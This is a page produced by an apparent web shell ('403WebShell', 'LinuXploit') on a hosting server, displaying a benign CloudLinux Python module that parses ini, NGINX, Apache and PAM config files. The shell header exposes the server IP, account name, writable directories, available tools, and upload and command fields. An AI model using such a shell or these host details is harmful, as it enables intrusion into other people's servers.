Failed to save the file to the "xx" directory.

Failed to save the file to the "ll" directory.

Failed to save the file to the "mm" directory.

Failed to save the file to the "wp" directory.

403WebShell
403Webshell
Server IP : 66.29.132.124  /  Your IP : 18.188.43.85
Web Server : LiteSpeed
System : Linux business141.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
User : wavevlvu ( 1524)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /opt/imunify360/venv/lib/python3.11/site-packages/clcommon/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /opt/imunify360/venv/lib/python3.11/site-packages/clcommon/clconfpars.py
# -*- coding: utf-8 -*-

# Copyright © Cloud Linux GmbH & Cloud Linux Software, Inc 2010-2018 All Rights Reserved
#
# Licensed under CLOUD LINUX LICENSE AGREEMENT
# http://cloudlinux.com/docs/LICENSE.TXT
#

import configparser
import locale
import os
import re
import syslog
from collections import namedtuple


class WebConfigParsingError(Exception):
    """
    Error type for web server config parsing failures.

    The description passed to the constructor is exposed as ``message`` and
    is also the standard exception argument (``args[0]`` / ``str(exc)``).
    """

    def __init__(self, message):
        # Initialize the base class explicitly instead of relying on
        # BaseException.__new__ to populate ``args``.
        super().__init__(message)
        self.message = message


class WebConfigMissing(Exception):
    """
    Raised when a web server config file to parse does not exist.

    The description passed to the constructor is exposed as ``message`` and
    is also the standard exception argument (``args[0]`` / ``str(exc)``).
    """

    def __init__(self, message):
        # Initialize the base class explicitly instead of relying on
        # BaseException.__new__ to populate ``args``.
        super().__init__(message)
        self.message = message


# Name of the artificial section header prepended to section-less files
# so that configparser accepts them.
SECHEAD = 'asection'


def load(path, case_sensitive=False, ignore_bad_encoding=False):
    """
    Parse a section-less ini-style file and return its options as a dict.

    :param path: path to the file to read
    :param case_sensitive: keep option names as written instead of
        letting configparser lower-case them
    :param ignore_bad_encoding: decode the file with the locale's preferred
        encoding, replacing undecodable bytes, instead of strict utf-8
    :return: dict mapping option name to value (None for value-less options)
    :raises: IOError, UnicodeDecodeError, configparser.Error
    """
    if ignore_bad_encoding:
        with open(path, 'rb') as stream:
            text = stream.read().decode(locale.getpreferredencoding(), 'replace')
    else:
        with open(path, 'r', encoding='utf-8') as stream:
            text = stream.read()

    parser = configparser.ConfigParser(
        allow_no_value=True,
        interpolation=None,
        strict=False,
    )
    if case_sensitive:
        # Identity transform: option names are stored verbatim
        parser.optionxform = str

    # The file has no section headers, so wrap its content into a fake one
    parser.read_string(f'[{SECHEAD}]\n' + text, source=path)
    return dict(parser.items(section=SECHEAD))


_QUOTES = "'", '"'


def _strip_escape_quotes_of_config_value(val: str) -> str:
    """
    Strip one pair of enclosing quotes from a config value.

    The quotes are removed only when the value is at least two characters
    long and both starts and ends with the same quote character (single or
    double). Any other value - including a lone quote character or a value
    with mismatched quotes - is returned unchanged.
    """
    # len() guard: a single quote char must not be treated as both the
    # opening and the closing quote of an empty string
    if len(val) >= 2 and val[0] == val[-1] and val.startswith(_QUOTES):
        return val[1:-1]
    return val


def load_fast(path, delimiter="=", strip_quotes=False):
    """
    Read a flat ``key<delimiter>value`` file into a dict using plain
    string splitting.

    Lines that do not contain the delimiter are skipped. Keys and values are
    stripped of surrounding whitespace; later occurrences of a key override
    earlier ones. Undecodable bytes are preserved via ``surrogateescape``.

    :param path: path to the file to read
    :param delimiter: separator between key and value (first occurrence wins)
    :param strip_quotes: additionally strip enclosing quotes from values
    :return: dict mapping key to value
    """
    result = {}
    with open(path, "r", encoding="utf-8", errors="surrogateescape") as stream:
        for raw_line in stream:
            pieces = raw_line.split(delimiter, 1)
            if len(pieces) != 2:
                # Skip broken lines
                continue

            name, raw_value = pieces
            cleaned = raw_value.strip()
            if strip_quotes:
                cleaned = _strip_escape_quotes_of_config_value(cleaned)
            result[name.strip()] = cleaned
    return result


# Parsed file contents keyed by path; filled by load_once()
cache = {}


def load_once(path, ignore_errors=False):
    """
    Return the content of an ini file as a dict, parsing it at most once.

    The result of the first call for a given path is stored in the
    module-level ``cache`` and returned on every subsequent call.

    :param path: path to the file to read
    :param ignore_errors: on IOError / configparser.Error cache and return
        an empty dict instead of raising
    """
    if path in cache:
        return cache[path]

    try:
        parsed = load(path)
    except (IOError, configparser.Error):
        if not ignore_errors:
            raise
        # Remember the failure as an empty config
        parsed = {}

    cache[path] = parsed
    return parsed


def change_settings(settings_dict, path, tmp_path=None):
    """
    Update ``key=value`` settings in a config file.

    The file is rewritten into a temporary file which then replaces the
    original via ``os.rename``. Every non-comment line whose key is present
    in ``settings_dict`` is replaced with ``key=<new value>``; keys not found
    in the file are appended at the end. All other lines (comments, blank
    lines, lines without ``=``) are copied unchanged.

    :param settings_dict: mapping of key -> new value
    :param path: path to the config file to modify
    :param tmp_path: temporary file path, ``path + ".tmp"`` by default
    :raises: IOError / OSError on file access failures
    """
    if not tmp_path:
        tmp_path = path + ".tmp"

    used_keys = set()
    last_written = ''

    with (open(path, 'r', encoding='utf-8') as fin,
          open(tmp_path, 'w', encoding='utf-8') as fout):
        for line in fin:
            stripped_line = line.strip()
            if stripped_line and not stripped_line.startswith('#'):
                # partition() tolerates lines without '=' (section headers,
                # bare keys) instead of failing on tuple unpacking
                key = stripped_line.partition('=')[0].strip()
                if key in settings_dict:
                    line = f'{key}={settings_dict[key]}\n'
                    used_keys.add(key)
            fout.write(line)
            last_written = line

        missing_keys = [key for key in settings_dict if key not in used_keys]
        # Do not glue the first appended setting onto an unterminated last line
        if missing_keys and last_written and not last_written.endswith('\n'):
            fout.write('\n')
        for key in missing_keys:
            fout.write(f'{key}={settings_dict[key]}\n')

    os.rename(tmp_path, path)


# Tokenizer pattern for NGINX configuration text: each match is a comment,
# a quoted string, a bare word, a structural character or a newline.
# Inner alternatives use non-capturing groups, so the only capturing group
# is the whole token.
_NGINX_TOKENS_RE = re.compile(
    r"""
    (
      # Comments
      (?: \# .* $ )

      # Single-, double-quoted strings and bare strings without whitespaces
      | (?: "[^"\n]*?" )
      | (?: '[^'\n]*?' )
      | (?: [^"';\s\{\}]+ )

      # Structural characters
      | ;
      | \{
      | \}
      | \n
    )
    """,
    re.IGNORECASE | re.MULTILINE | re.VERBOSE,
)


def _ngx_tokenize(data):
    """
    Lazily split NGINX configuration text into tokens.

    Returns a generator over the non-empty matches of ``_NGINX_TOKENS_RE``
    with comment tokens filtered out.
    """
    return (
        text
        for text in (found.group(0) for found in _NGINX_TOKENS_RE.finditer(data))
        # Drop empty matches and explicitly ignore comments
        if text and not text.startswith('#')
    )

def _ngx_take_until(it, val):
    """
    Yield tokens from ``it`` until one contained in ``val`` is met.

    The terminating token is consumed from ``it`` but not yielded.
    """
    for token in it:
        if token not in val:
            yield token
        else:
            break

def _ngx_take_until_block_end(it):
    """
    Yield tokens from ``it`` up to the ``}`` closing the current block.

    The iterator is expected to be positioned just after the opening ``{``.
    Nested blocks are yielded with their braces; the closing brace of
    the current block is consumed but not yielded.
    """
    depth = 1
    for token in it:
        if token == "}":
            depth -= 1
            if depth < 1:
                # Matching brace of the block we started in
                return
        elif token == "{":
            depth += 1
        yield token

def _ngx_scan_block_info(block_tokens, need_fields):
    """
    Collect values of the requested directives from a block's tokens.

    Nested blocks are skipped. For every token found in ``need_fields``
    the following tokens up to ``;`` or a newline are stored as a list;
    a later occurrence of the same directive overrides an earlier one.

    :param block_tokens: iterator over the tokens of a single block
    :param need_fields: directive names to gather
    :return: dict mapping directive name to its list of value tokens
    """
    found = {}
    for token in block_tokens:
        if token == "{":
            # Drain the inner block so its directives are not picked up
            for _skipped in _ngx_take_until_block_end(block_tokens):
                pass
        if token in need_fields:
            # The last occurrence wins
            found[token] = [*_ngx_take_until(block_tokens, ";\n")]

    return found


def nginx_conf_loose_parser(data):
    """
    Parse content of NGINX configuration in a manner tolerant to minor mistakes
    and extract relevant fields from all `server` directives.

    Relevant fields are:
    - `server_name`
    - `root` - returned as `document_root`
    - `ssl` - if `listen` field contains "ssl" word

    Only the first value of `server_name` and of `root` is returned.
    `server` blocks where either directive is missing or has no value
    are skipped.

    Doesn't handle interpolated values (ex. `${val}`) outside of quoted strings

    :param data: text of the NGINX configuration
    :return: generator of dicts with `server_name`, `document_root`, `ssl` keys
    """
    tokens = _ngx_tokenize(data)
    for tok in tokens:
        if tok != "server":
            continue

        # Nothing seems to be allowed between "server" directive and
        #  the opening of its block, so we just discard everything
        #  until first block opening seen
        for _ in _ngx_take_until(tokens, "{"):
            pass

        # Limit further scan by the inside of block
        block_tokens = _ngx_take_until_block_end(tokens)

        # By using only `block_tokens` we ensure all blocks are properly delimited
        info = _ngx_scan_block_info(block_tokens, ("server_name", "root", "listen"))
        server_name = info.get("server_name")
        root = info.get("root")
        # Both values are indexed below, so skip the block when either one
        #  is absent or empty (ex. `server_name;`)
        if not server_name or not root:
            continue

        yield {
            "server_name": _strip_escape_quotes_of_config_value(server_name[0]),
            "document_root": _strip_escape_quotes_of_config_value(root[0]),
            "ssl": "ssl" in info.get("listen", []),
        }


def nginx_conf_parser(conf_file):
    """
    Read an NGINX config file and return the list of its `server` entries,
    see `nginx_conf_loose_parser` for more details

    :raises: WebConfigMissing when `conf_file` is not an existing file
    """
    if os.path.isfile(conf_file):
        text = read_unicode_file_with_decode_fallback(conf_file)
        return [*nginx_conf_loose_parser(text)]

    raise WebConfigMissing(f'File does not exists {conf_file}')


def _apache_vhost_port(address):
    """Return the port of a ``<VirtualHost>`` address token, 0 when unknown."""
    address = address.rstrip('>')
    if address.startswith('['):
        # Bracketed IPv6 literal, e.g. "[::1]:443": the port follows "]:"
        port = address.partition(']')[2].lstrip(':')
    else:
        pieces = address.split(':')
        # Exactly "host:port"; anything else carries no usable port
        port = pieces[1] if len(pieces) == 2 else ''
    try:
        return int(port)
    except ValueError:
        # Missing or wildcard ("*") port
        return 0


def apache_conf_parser(conf_file):
    """
    Extract basic information about every ``<VirtualHost>`` block of an
    Apache config file.

    Lines containing ``#`` anywhere are ignored entirely. Only blocks that
    are closed with ``</VirtualHost>`` are reported. Directives are matched
    by substring and only the first argument is used (all arguments for
    ``ServerAlias``, joined with commas); directives without an argument
    are ignored.

    :param conf_file: path to the Apache config file
    :return: list of dicts with keys ``user``, ``server_name``,
        ``document_root``, ``server_alias``, ``port`` and ``ssl``
    :raises: WebConfigMissing when ``conf_file`` is not an existing file
    """
    if not os.path.isfile(conf_file):
        raise WebConfigMissing(f'File does not exists {conf_file}')

    content = read_unicode_file_with_decode_fallback(conf_file)
    # Any line with a '#' in it is dropped as a whole
    lines = [line for line in content.splitlines() if '#' not in line]

    # Completed virtual hosts as (port, directive lines) pairs
    vhosts = []
    current = None
    for line in lines:
        if "<VirtualHost" in line:
            # An opening tag inside a not yet closed block does not start
            # a new one: the first address of the block is kept
            if current is None:
                fields = line.split()
                address = fields[1] if len(fields) > 1 else ''
                current = (_apache_vhost_port(address), [])
            continue

        if "</VirtualHost>" in line:
            # A closing tag without a matching opening one is ignored
            if current is not None:
                vhosts.append(current)
                current = None
            continue

        if current is not None:
            current[1].append(line)

    conf_data = []
    for port, directives in vhosts:
        data = {
                'user' : None,
                'server_name' : '',
                'document_root' : '',
                'server_alias' : None,
                'port' : port,
                'ssl' : False,
               }
        for line in directives:
            fields = line.split()
            has_value = len(fields) > 1
            if "ServerName" in line:
                if has_value:
                    data['server_name'] = fields[1].replace('www.', '')
                continue
            if "DocumentRoot" in line:
                if has_value:
                    # the path may be enclosed in double quotes
                    data['document_root'] = fields[1].strip('"')
                continue
            if "ServerAlias" in line:
                data['server_alias'] = ','.join(fields[1:])
                continue
            if "SuexecUserGroup" in line and has_value:
                data['user'] = fields[1]
            if "SSLEngine" in line and has_value:
                data['ssl'] = fields[1].lower() == 'on'

        conf_data.append(data)

    return conf_data


PamLVECfg = namedtuple('PamLVECfg', ['min_uid', 'cagefs_enabled', 'groups'])


def parse_pam_lve_config(configfile):
    """
    Parse string like:
    "session      required      pam_lve.so      500      1     group1,group2"

    The first line whose third field is ``pam_lve.so`` is used. Everything
    from ``#`` to the end of a line is treated as a comment and ignored.
    Missing arguments fall back to defaults: min_uid 500, cagefs disabled,
    groups ``['wheel']``.

    :param configfile: path to config file to parse
    :type configfile: str
    :return: PamLVECfg instance when pam_lve configuration is found, None otherwise
    :rtype: namedtuple
    :raises: IOError, ValueError
    """
    with open(configfile, 'r', encoding='utf-8') as f:
        for line in f:
            # Cut the comment part first, so that neither indented comment
            # lines nor trailing comments are parsed as arguments
            s = line.partition('#')[0].split()
            if len(s) >= 3 and s[2] == 'pam_lve.so':
                # parse config string taking pam_lve defaults into account
                min_uid = int(s[3]) if len(s) >= 4 else 500
                cagefs_enabled = bool(int(s[4])) if len(s) >= 5 else False
                groups = s[5].split(',') if len(s) >= 6 else ['wheel']
                return PamLVECfg(min_uid, cagefs_enabled, groups)
    # pam_lve line is not found in config file
    return None


def read_unicode_file_with_decode_fallback(file_path: str) -> str:
    """
    Return the content of a file decoded as utf-8.

    When the content is not valid utf-8, a warning is written to syslog and
    the invalid sequences are replaced with placeholders instead of raising.
    """
    with open(file_path, 'rb') as stream:
        payload = stream.read()

    try:
        text = payload.decode()
    except UnicodeDecodeError:
        syslog.syslog(
            syslog.LOG_WARNING,
            f'Failed to decode "{file_path}" content as utf-8 - loading with placeholders for invalid unicode sequences'
        )
        # Second pass never fails: bad bytes become U+FFFD
        text = payload.decode(errors='replace')
    return text

Youez - 2016 - github.com/yon3zu
LinuXploit